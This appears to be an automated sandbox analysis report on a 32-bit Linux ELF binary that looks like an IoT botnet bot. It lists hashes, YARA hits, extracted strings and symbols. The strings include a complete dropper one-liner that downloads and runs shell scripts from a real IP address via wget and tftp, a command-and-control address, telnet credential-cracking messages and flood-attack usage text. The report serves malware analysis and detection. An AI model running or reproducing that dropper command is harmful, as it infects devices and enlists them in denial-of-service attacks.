Report #1832 cancel

Binary
ABI
ELFOSABI_SYSV
Size
133.73KB
Type
ET_EXEC
trid
50.1% ELF Executable and Linkable format
49.8% ELF Executable and Linkable format
type
ELF
Wordsize
32
Architecture
x86
Hashes
md5
8fe3321ad236dc3357853fb0f42fd5f6
sha1
2bbcb5ae40f614ab895864c23a91770055979c34
crc32
0x147304f2
sha224
57cd7c25676d0fea5bc9bbf744ea000e6e6fb8073febb6974d9efaf5
sha256
c8c19855b1fecdc283bd419724eb4637406c1827992b201c7520680bcd218ac9
sha384
6ee94c59fd17ad839531ae8eadbdd45082224246f8d774671b90b145b2dfef719e703eec4b72b3d809714d54ca6738b4
sha512
66d79ad283308d0e000a2e22bb4382b7c343ad36a7ec3feeb55a5246c87276721cb08b486ad3456c672bf58a7048e58b7447d1c6f1dd5d2e64f7b381f40cf725
ssdeep
3072:dZLYkGGNEZJaFUYwtisudhQ3QQPZmALIEJY7TG:YOMufdXsZmALIEy7TG
Community
Google
False cancel
HashLib
False cancel
YARA
Matches
maldoc_getEIP_method_1, domain, url, IP, contentis_base64, is__elf

Suspicious
True check_circle

Dwarf
List

Number
0
Files
Sys
/sys/devices/system/cpu
Home

Proc
/proc/cpuinfo, /proc/net/route, ?/proc/stat, /proc/cpuinfo
Password

Suspicious
True check_circle
Flags
Flags
0
Packer
List
None
Packed
False cancel
Network
IPs
185.106.122.57:555, Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5, Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11, Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11, Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5, Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5, Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11, Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5, Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11, cd /tmp || cd /var/run;wget http://185.106.122.57/bin.sh;sh bin.sh;rm -rf bin.sh;tftp -r bin2.sh -g 185.106.122.57;sh bin2.sh; tftp 185.106.122.57 -c get bin3.sh; sh bin3.sh; rm -rf bin2.sh bin3.sh bin.sh, 185.106.122.57
URLs
cd /tmp || cd /var/run;wget http://185.106.122.57/bin.sh;sh bin.sh;rm -rf bin.sh;tftp -r bin2.sh -g 185.106.122.57;sh bin2.sh; tftp 185.106.122.57 -c get bin3.sh; sh bin3.sh; rm -rf bin2.sh bin3.sh bin.sh, GET gtop.sh
Mails

Suspicious
True check_circle
Strings
List
cd /tmp || cd /var/run;wget http://185.106.122.57/bin.sh;sh bin.sh;rm -rf bin.sh;tftp -r bin2.sh -g 185.106.122.57;sh bin2.sh; tftp 185.106.122.57 -c get bin3.sh; sh bin3.sh; rm -rf bin2.sh bin3.sh bin.sh
185.106.122.57:555
GET gtop.sh
/etc/rc.conf
.got.plt
/etc/resolv.conf
None Killed.
Network is down
Machine is not on the network
Killed %d.
No route to host
Host is down
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Unknown host
Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1
185.106.122.57
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5
TCP <target> <port (0 for random)> <time> <netmask (32 for non spoofed)> <flags (syn, ack, psh, rst, fin, all) comma seperated> (packet size, usually 0) (time poll interval, default 10)
been_there_done_that
_fwrite.c
__write_nocancel
libc-cancellation.c
contains_fail
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Transport endpoint is not connected
No such process
Block device required
TELNET LOGIN CRACKED - %s:%s:%s
No such device or address
Remote address changed
Telnet'd %s|%s|%s|23
Operation now in progress
Connection reset by peer
Link has been severed
No such device
Object is remote
Too many open files
Is a named type file
Too many open files in system
Too many links
fork failed
infected
unctelnet %s|%s|%s|23
REPORT %s:%s:%s
Version: %d.%d
Range %d->%d
.lib section in a.out corrupted
Cannot send after transport endpoint shutdown
>%s.t && cd %s ; >retrieve
Operation not permitted
My IP: %s
FUK YEA I DO (%s)
Invalid flag "%s"
8.8.8.8
My Public IP: %s
TEST %s
BUILD %s
BUILD %s
hoste.6860
dnslookup.c
Too many users
__GI_execl
__dns_lookup
__GI_fflush_unlocked
PONG!
__GI_gethostname
__libc_nanosleep
__GI_sleep
__local_nameserver
__open_nameservers
__nameserver
__socketcall
__syscall_nanosleep
__close_nameservers
__register_atfork
__GI_execve
__register_frame_info_bases
usleep.c
/etc/hosts
__GI_pipe
_Jv_RegisterClasses
get_telstate_host
__deregister_frame_info_bases
closenameservers.c
socket_connect
gethostbyname_r
gethostbyname.c
gethostname.c
opennameservers.c
register-atfork.c
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11
fflush_unlocked.c
__GI_nanosleep

Symbols
List
crtstuff.c, __CTOR_LIST__, __DTOR_LIST__, __EH_FRAME_BEGIN__, __JCR_LIST__, __do_global_dtors_aux, completed.4963, p.4961, frame_dummy, object.4975, crtstuff.c, __CTOR_END__, __DTOR_END__, __FRAME_END__, __JCR_END__, __do_global_ctors_aux, initfini.c, client.c, c, Q, i.4874, printchar, prints, printi, print, fdopen_pids, hextable, ipState, __syscall_fcntl.c, _exit.c, chdir.c, dup2.c, getcwd.c, getdtablesize.c, getpagesize.c, getrlimit.c, ioctl.c, kill.c, pipe.c, prctl.c, select.c, __syscall_select, setsid.c, sigprocmask.c, time.c, isspace.c, toupper.c, __C_ctype_b.c, __C_ctype_b_data, __C_ctype_toupper.c, __C_ctype_toupper_data, errno.c, __errno_location.c, fclose.c, _L_lock_18, _L_lock_53, _L_unlock_65, _L_unlock_82, _L_lock_103, _L_unlock_113, fopen.c, perror.c, printf.c, fprintf.c, snprintf.c, sprintf.c, vsnprintf.c, _fopen.c, _L_lock_205, _L_lock_216, _L_unlock_232, _L_unlock_242, _stdio.c, _stdio_streams, _fixed_buffers, _wcommit.c, vfprintf.c, _L_lock_18, _L_unlock_62, _vfprintf_internal.c, _charpad, _fp_out_narrow, spec_base.6615, prefix.6616, _ppfs_init.c, _ppfs_prepargs.c, _ppfs_setargs.c, _ppfs_parsespec.c, _promoted_size, type_codes, type_sizes, spec_flags.6620, qual_chars.6625, spec_chars.6621, spec_ranges.6622, spec_or_mask.6623, spec_and_mask.6624, _bss_custom_printf_spec, feof.c, _L_lock_17, _L_unlock_35, fgets.c, _L_lock_18, _L_unlock_43, fputs.c, _L_lock_18, _L_unlock_43, fflush_unlocked.c, _L_lock_13, _L_lock_30, _L_unlock_88, _L_unlock_104, _L_lock_144, _L_unlock_156, _L_lock_164, _L_unlock_174, _L_lock_195, _L_unlock_239, fgets_unlocked.c, fputs_unlocked.c, fwrite_unlocked.c, memcpy.c, memset.c, strcat.c, strchr.c, strcmp.c, strcpy.c, strlen.c, strncpy.c, strnlen.c, strstr.c, __glibc_strerror_r.c, __xpg_strerror_r.c, unknown.1636, _string_syserrmsgs.c, bcopy.c, bzero.c, strcasecmp.c, strcasestr.c, strtok.c, next_start.1613, isatty.c, tcgetattr.c, ntohl.c, herror.c, error_msg, h_errlist, colon_space.4870, inet_ntoa.c, buf.4724, inet_makeaddr.c, gethostbyname.c, gethostbyname2.c, buf.6861, hoste.6860, connect.c, getsockname.c, getsockopt.c, recv.c, send.c, sendto.c, setsockopt.c, shutdown.c, socket.c, sigaddset.c, sigempty.c, signal.c, sigsetops.c, malloc.c, __malloc_largebin_index, realloc.c, free.c, __malloc_trim, abort.c, mylock, been_there_done_that, rand.c, random.c, mylock, unsafe_state, randtbl, random_r.c, random_poly_info, atol.c, strtol.c, _stdlib_strto_l.c, exit.c, execl.c, sysconf.c, nprocessors_onln, usleep.c, fork.c, _L_lock_70, _L_unlock_167, register-atfork.c, _L_lock_28, fork_handler_pool, _L_unlock_93, getpid.c, raise.c, sleep.c, pseudo_cancel, SAVEBX1, RESTBX1, pseudo_end, pseudo_cancel, PUSHBX1, POPBX1, pseudo_end, pseudo_cancel, PUSHBX1, POPBX1, pseudo_end, pseudo_cancel, PUSHBX1, POPBX1, pseudo_end, pseudo_cancel, PUSHBX1, POPBX1, pseudo_end, libc-cancellation.c, __uClibc_main.c, __pthread_return_0, __check_one_fd, system.c, cancel_handler, lock, _L_lock_30, sa_refcntr, quit, intr, _L_unlock_52, do_system, _L_lock_74, _L_unlock_113, _L_lock_129, _L_unlock_158, _L_lock_288, _L_unlock_328, __syscall_error.c, sigaction.c, __restore_rt, __restore, __socketcall.c, __syscall_rt_sigaction.c, execve.c, getegid.c, geteuid.c, getgid.c, getuid.c, mremap.c, munmap.c, nanosleep.c, __syscall_nanosleep, sbrk.c, __C_ctype_tolower.c, __C_ctype_tolower_data, closedir.c, opendir.c, fd_to_DIR, C.11.5298, readdir64.c, parse_config.c, wcrtomb.c, wcsrtombs.c, wcsnrtombs.c, _WRITE.c, _fwrite.c, _trans2w.c, _load_inttype.c, _store_inttype.c, _uintmaxtostr.c, _fpmaxtostr.c, fmt, exp10_table, fgetc.c, _L_lock_35, _L_unlock_65, fgetc_unlocked.c, memmove.c, strchrnul.c, strrchr.c, memrchr.c, strcspn.c, strspn.c, strtok_r.c, strpbrk.c, inet_aton.c, gethostbyname2_r.c, calloc.c, libc-tls.c, init_static_tls, static_slotinfo, static_dtv, static_map, dl-support.c, brk.c, fstat.c, xstatconv.c, getdents64.c, fseeko.c, fseeko64.c, _L_lock_34, _L_unlock_108, _READ.c, _adjust_pos.c, _rfill.c, _trans2r.c, _cs_funcs.c, rawmemchr.c, mempcpy.c, ntop.c, inet_pton4, xdigits.5147, inet_ntop4, decoded.c, dnslookup.c, last_id.6918, last_ns_num.6917, opennameservers.c, skip_nospace, skip_and_NUL_space, resolv_conf_mtime.6903, closenameservers.c, get_hosts_byname_r.c, gethostbyname_r.c, gethostname.c, poll.c, __syscall_poll, stat.c, uname.c, llseek.c, strdup.c, encodeh.c, decodeh.c, encodeq.c, read_etc_hosts_r.c, encoded.c, __fini_array_end, __fini_array_start, __init_array_end, __preinit_array_end, _GLOBAL_OFFSET_TABLE_, __init_array_start, __preinit_array_start, __read_etc_hosts_r, __GI_execve, __libc_sigaction, strcpy, recvLine, rangesA, __GI_sigaddset, __socketcall, __GI___ctype_b, __GI___glibc_strerror_r, waitpid, __res_sync, __open_nameservers, __GI_fopen, getrlimit, ioctl, _stdio_openlist_use_count, __GI_initstate_r, __GI_sigaction, strtok_r, __GI_time, getgid, __getpid, sysconf, printf, stdout, random, __GI_strdup, __GI_getpagesize, getdtablesize, fdopendir, contains_fail, __GI___ctype_toupper, __GI_strcasecmp, recv, connect, spoofTest, __encode_question, __GI___uClibc_fini, numpids, __encode_header, sigemptyset, getRandomPublicIPB, __pthread_mutex_lock, initConnection, __sigdelset, __xstat32_conv, __uClibc_fini, memrchr, geteuid, inet_pton, __GI_snprintf, __GI_vsnprintf, __GI_setsid, memmove, sendTCP, snprintf, __GI_strpbrk, __GI_fgetc, __GI_htonl, __stdio_trans2r_o, munmap, __GI_setsockopt, __libc_stack_end, __GI_fclose, __GI_wcsnrtombs, __GI_pipe, rangesB2, _uintmaxtostr, __libc_fcntl, atol, getRandomPublicIP, __write, getc_unlocked, __ctype_b, __GI_random_r, usernames, errno, getegid, read_until_response, __GI_sbrk, zprintf, __GI___uClibc_init, usleep, __libc_h_errno, execve, infectedmessage, getpagesize, getpid, __GI_lseek64, setstate_r, fgets, getHost, wildString, dupppp, __waitpid_nocancel, __xpg_strerror_r, __read, getc, prctl, _dl_tls_static_used, memcpy, makeRandomStr, getRandomIP, __GI_fputs_unlocked, execl, __GI_fgets, perror, __GI___open_nocancel, sendHTTP, _stdio_openlist_dec_use, sclose, __libc_select, _ppfs_init, __GI___C_ctype_toupper, __GI_fgetc_unlocked, __libc_nanosleep, trim, __GI_fgets_unlocked, dup2, __pthread_mutex_init, getuid, __GI_htons, system, __open_etc_hosts, feof, malloc, __open, isatty, sleep, vsnprintf, __dns_lookup, __GI_read, __C_ctype_tolower, __GI___write_nocancel, random_r, __dso_handle, __nptl_deallocate_tsd, gethostbyname_r, tcpcsum, reset_telstate, fdpclose, socket, __GI_dup2, select, _dl_nothread_init_static_tls, __GI_ntohl, _pthread_cleanup_pop_restore, __GI_wcrtomb, __GI___libc_fcntl, __GI_memset, __GI_closedir, isspace, __stdio_seek, mempcpy, __GI_strcoll, __GI_write, __ctype_toupper, __resolv_timeout, __libc_read, __GI_opendir, __libc_disable_asynccancel, _string_syserrmsgs, __GI_herror, __GI_open, __GI_strchr, __searchdomain, sigaddset, _dl_tls_static_align, __GI_tcgetattr, __environ, mmap, __GI_ntohs, _Exit, wcsnrtombs, bzero, makeIPPacket, _dl_tls_max_dtv_idx, sockprintf, __GI_inet_ntoa, send, __fgetc_unlocked, abort, oldranges, __GI_fcntl, __GI_wcsrtombs, __GI_fwrite_unlocked, __GI___register_atfork, __GI_getgid, srandom_r, __GI_fputs, __open_nocancel, _init, __GI_inet_ntoa_r, __GI_setstate_r, parseHex, strtol, __GI___read, pipe, strnlen, rawmemchr, uname, __GI_mempcpy, __malloc_state, __sigaddset, strrchr, nanosleep, __GI_send, calloc, h_errno, sendHTTP2, __pthread_mutex_unlock, __register_frame_info_bases, __GI_exit, __app_fini, csum, __exit_cleanup, rindex, __GI_execl, __GI_srandom_r, __GI___sigismember, __GI___ctype_tolower, write, __fork_generation_pointer, environ, __GI_close, getBuild, fstat, fprintf, __resolv_lock, kill, fputs_unlocked, __pthread_mutex_trylock, __GI___sigaddset, strcat, __GI_brk, __GI_strcat, _dl_tls_static_size, __GI_nanosleep, __GI_stat, __GI_strtok, _stdio_openlist, __GI_sigprocmask, inet_addr, ntohl, __GI_gethostname, __GI_fseek, _custom_printf_arginfo, __GI___libc_write, ourIP, chdir, fseeko, _stdio_openlist_del_count, connectTimeout, setsockopt, bsd_signal, fseek, mremap, __GI_kill, __GI_strcmp, __GI___open, __GI_memmove, sendSTD, setstate, __read_nocancel, __decode_dotted, __local_nameserver, __stdio_READ, __GI_toupper, __pthread_initialize_minimal, __GI_recv, tmpdirs, __stdin, stdin, __GI_isatty, _dl_tls_dtv_slotinfo_list, _custom_printf_spec, gethostbyname2_r, __progname, strcasestr, _start, __deregister_frame_info_bases, __GI___read_nocancel, strstr, __GI_ioctl, init_rand, rand, __close_nameservers, __libc_errno, getRandomPublicIP2, signal, read, __xstat64_conv, __decode_header, getCores, __GI_memcpy, strcoll, rangesC1, oldranges2, wcsrtombs, _stdio_user_locking, __linkin_atfork, strncpy, __GI___libc_close, program_invocation_short_name, strcasecmp, htonl, sendto, __C_ctype_toupper, StartTheLelz, __GI___C_ctype_b, realloc, __register_atfork, __GI_gethostbyname_r, __GI_strncpy, _dl_tls_dtv_gaps, __libc_send, __GI___xpg_strerror_r, currentServer, readdir64, __GI___C_ctype_tolower, __GI_getrlimit, bcopy, __GI_strcpy, __GI_inet_ntop, strtok, __stdio_adjust_position, malloc_trim, __GI_poll, _vfprintf_internal, __GI_strcasestr, fork, __GI___fcntl_nocancel, __stdio_rfill, gotIP, __GI_sleep, sigaction, __GI_gethostbyname, _dl_phdr, __GI_getc_unlocked, __uClibc_init, __GI_munmap, versionnnn, _store_inttype, __getpagesize, __GI_random, __GI_mremap, __syscall_error, __uclibc_progname, __GI_getegid, __malloc_lock, __uClibc_main, sbrk, __rtld_fini, __GI_fork, strdup, __libc_close, __GI_getpid, inet_aton, _pthread_cleanup_push_defer, index, processCmd, __sigismember, fopen, __bss_start, __libc_open, __pthread_unwind, __GI_strchrnul, getOurIP, get_telstate_host, memset, __GI_socket, main, __glibc_strerror_r, ourPublicIP, echoLoader, listFork, __stdio_fwrite, _dl_tls_setup, negotiate, srand, _dl_tls_generation, __GI_uname, __resolv_attempts, __nptl_nthreads, initstate, fclose, __syscall_rt_sigaction, rangesC3, ntohs, sendUDP, inet_ntoa, tcgetattr, time, opendir, __libc_system, __GI_abort, poll, __GI___write, fdpopen, __GI_fprintf, __GI___sigdelset, __get_hosts_byname_r, __GI___close_nocancel, rangesB1, __GI__exit, herror, strcmp, infected, __GI_strrchr, shutdown, advances2, __nameserver, data_start, __GI_sysconf, __fork_handlers, infect, __h_errno_location, matchPrompt, getcwd, __GI_inet_pton, __libc_enable_asynccancel, gethostbyname, _stdio_fopen, advance_state, _fini, __GI_chdir, __write_nocancel, __vfork, __GI_mmap, fgetc, gethostname, contains_success, sprintf, fdgets, __get_pc_thunk_bx, strerror_r, __GI_select, __libc_waitpid, strcspn, socket_connect, __GI_waitpid, _stdio_term, __GI_vfprintf, __GI_signal, stderr, fails, __GI_readdir64, commServer, getRandomPublicIPC, vfork, __C_ctype_b, __libc_setup_tls, srandom, _ppfs_setargs, __GI___libc_waitpid, __GI_sendto, __GI_sigemptyset, __GI_printf, __waitpid, __libc_fork, __close_nocancel, _dl_init_static_tls, __atexit_lock, scanPid, __fork_lock, __fcntl_nocancel, rand_cmwc, findARandomIP, advances, getsockopt, __GI_fseeko64, _dl_tls_static_nelem, hstrerror, fflush_unlocked, __stdio_wcommit, contains_string, __GI___fgetc_unlocked, __nameservers, fwrite_unlocked, subversionnnn, stat, inet_ntoa_r, __pagesize, _stdio_openlist_add_lock, __GI_getdtablesize, contains_response, __GI___waitpid, __close, __GI_gethostbyname2, _edata, __stdout, __GI___close, __GI_memrchr, __GI_fflush_unlocked, __GI_isspace, __GI_strstr, __searchdomains, __GI_fstat, _end, htons, _sigintr, _ppfs_prepargs, __GI_strspn, fgetc_unlocked, initstate_r, __GI_connect, __curbrk, contains_infectmessage, _dl_phnum, _fpmaxtostr, __errno_location, uppercase, _stdlib_strto_l, __GI___libc_open, exit, rangesC2, __stdio_WRITE, _stdio_init, __GI_geteuid, inet_ntop, brk, gethostbyname2, __GI_getcwd, _dl_aux_init, __GI_perror, atoi, successes, _stdio_openlist_del_lock, __GI_inet_aton, _custom_printf_handler, _setjmp, fgets_unlocked, _exit, szprintf, strspn, __libc_recv, __getdents64, __lll_lock_wait_private, strlen, lseek64, open, program_invocation_name, toupper, __libc_write, __malloc_consolidate, _ppfs_parsespec, __GI_strtol, __GI_getuid, __GI_strtok_r, __fork, __libc_sendto, __stdio_trans2w_o, __GI_vfork, __GI_config_read, strchr, __GI_rawmemchr, __GI_gethostbyname2_r, fputs, __GI_raise, __data_start, setsid, __GI_inet_addr, __GI_config_open, closedir, getRandomPublicIPA, __encode_dotted, __GI_strnlen, _Jv_RegisterClasses, macAddress, __GI___libc_read, __GI___errno_location, strchrnul, readUntil, fcntl, read_with_timeout, __GI_atoi, fseeko64, __GI_sprintf, __ctype_tolower, wcrtomb, __GI_getsockname, close, __GI_config_close, __libc_connect, passwords, __GI_strlen, mainCommSock, pids, sendCNC, vfprintf, __progname_full, strpbrk, getBogos, _load_inttype, __lll_unlock_wake_private, rangechoice, raise, useragents, free, __GI_strcspn, sigprocmask, getsockname
Number
965
Reason
None
Suspicious
False cancel
Version
Version
EV_CURRENT
Foremost
Matches
None
Suspicious
False cancel
Sections
List
, .init, .text, .fini, .rodata, .eh_frame, .tbss, .ctors, .dtors, .jcr, .got.plt, .data, .bss, .stab, .stabstr, .comment, .shstrtab, .symtab, .strtab
Number
19
Suspicious
False cancel
Segments
Number
4
Suspicious
False cancel
Compilers
List
GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1, GCC: (GNU) 4.2.1
Identified
184
Suspicious
True check_circle
Functions
List
, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , crtstuff.c, , __CTOR_LIST__, , __DTOR_LIST__, , __EH_FRAME_BEGIN__, , __JCR_LIST__, , __do_global_dtors_aux, , completed.4963, , p.4961, , frame_dummy, , object.4975, , crtstuff.c, , __CTOR_END__, , __DTOR_END__, , __FRAME_END__, , __JCR_END__, , __do_global_ctors_aux, , initfini.c, , client.c, , c, , Q, , i.4874, , printchar, , prints, , printi, , print, , fdopen_pids, , hextable, , ipState, , __syscall_fcntl.c, , _exit.c, , chdir.c, , dup2.c, , getcwd.c, , getdtablesize.c, , getpagesize.c, , getrlimit.c, , ioctl.c, , kill.c, , pipe.c, , prctl.c, , select.c, , __syscall_select, , setsid.c, , sigprocmask.c, , time.c, , isspace.c, , toupper.c, , __C_ctype_b.c, , __C_ctype_b_data, , __C_ctype_toupper.c, , __C_ctype_toupper_data, , errno.c, , __errno_location.c, , fclose.c, , _L_lock_18, , _L_lock_53, , _L_unlock_65, , _L_unlock_82, , _L_lock_103, , _L_unlock_113, , fopen.c, , perror.c, , printf.c, , fprintf.c, , snprintf.c, , sprintf.c, , vsnprintf.c, , _fopen.c, , _L_lock_205, , _L_lock_216, , _L_unlock_232, , _L_unlock_242, , _stdio.c, , _stdio_streams, , _fixed_buffers, , _wcommit.c, , vfprintf.c, , _L_lock_18, , _L_unlock_62, , _vfprintf_internal.c, , _charpad, , _fp_out_narrow, , spec_base.6615, , prefix.6616, , _ppfs_init.c, , _ppfs_prepargs.c, , _ppfs_setargs.c, , _ppfs_parsespec.c, , _promoted_size, , type_codes, , type_sizes, , spec_flags.6620, , qual_chars.6625, , spec_chars.6621, , spec_ranges.6622, , spec_or_mask.6623, , spec_and_mask.6624, , _bss_custom_printf_spec, , feof.c, , _L_lock_17, , _L_unlock_35, , fgets.c, , _L_lock_18, , _L_unlock_43, , fputs.c, , _L_lock_18, , _L_unlock_43, , fflush_unlocked.c, , _L_lock_13, , _L_lock_30, , _L_unlock_88, , _L_unlock_104, , _L_lock_144, , _L_unlock_156, , _L_lock_164, , _L_unlock_174, , _L_lock_195, , _L_unlock_239, , fgets_unlocked.c, , fputs_unlocked.c, , fwrite_unlocked.c, , memcpy.c, , memset.c, , strcat.c, , strchr.c, , strcmp.c, , strcpy.c, , strlen.c, , strncpy.c, , strnlen.c, , strstr.c, , __glibc_strerror_r.c, , __xpg_strerror_r.c, , unknown.1636, , _string_syserrmsgs.c, , bcopy.c, , bzero.c, , strcasecmp.c, , strcasestr.c, , strtok.c, , next_start.1613, , isatty.c, , tcgetattr.c, , ntohl.c, , herror.c, , error_msg, , h_errlist, , colon_space.4870, , inet_ntoa.c, , buf.4724, , inet_makeaddr.c, , gethostbyname.c, , gethostbyname2.c, , buf.6861, , hoste.6860, , connect.c, , getsockname.c, , getsockopt.c, , recv.c, , send.c, , sendto.c, , setsockopt.c, , shutdown.c, 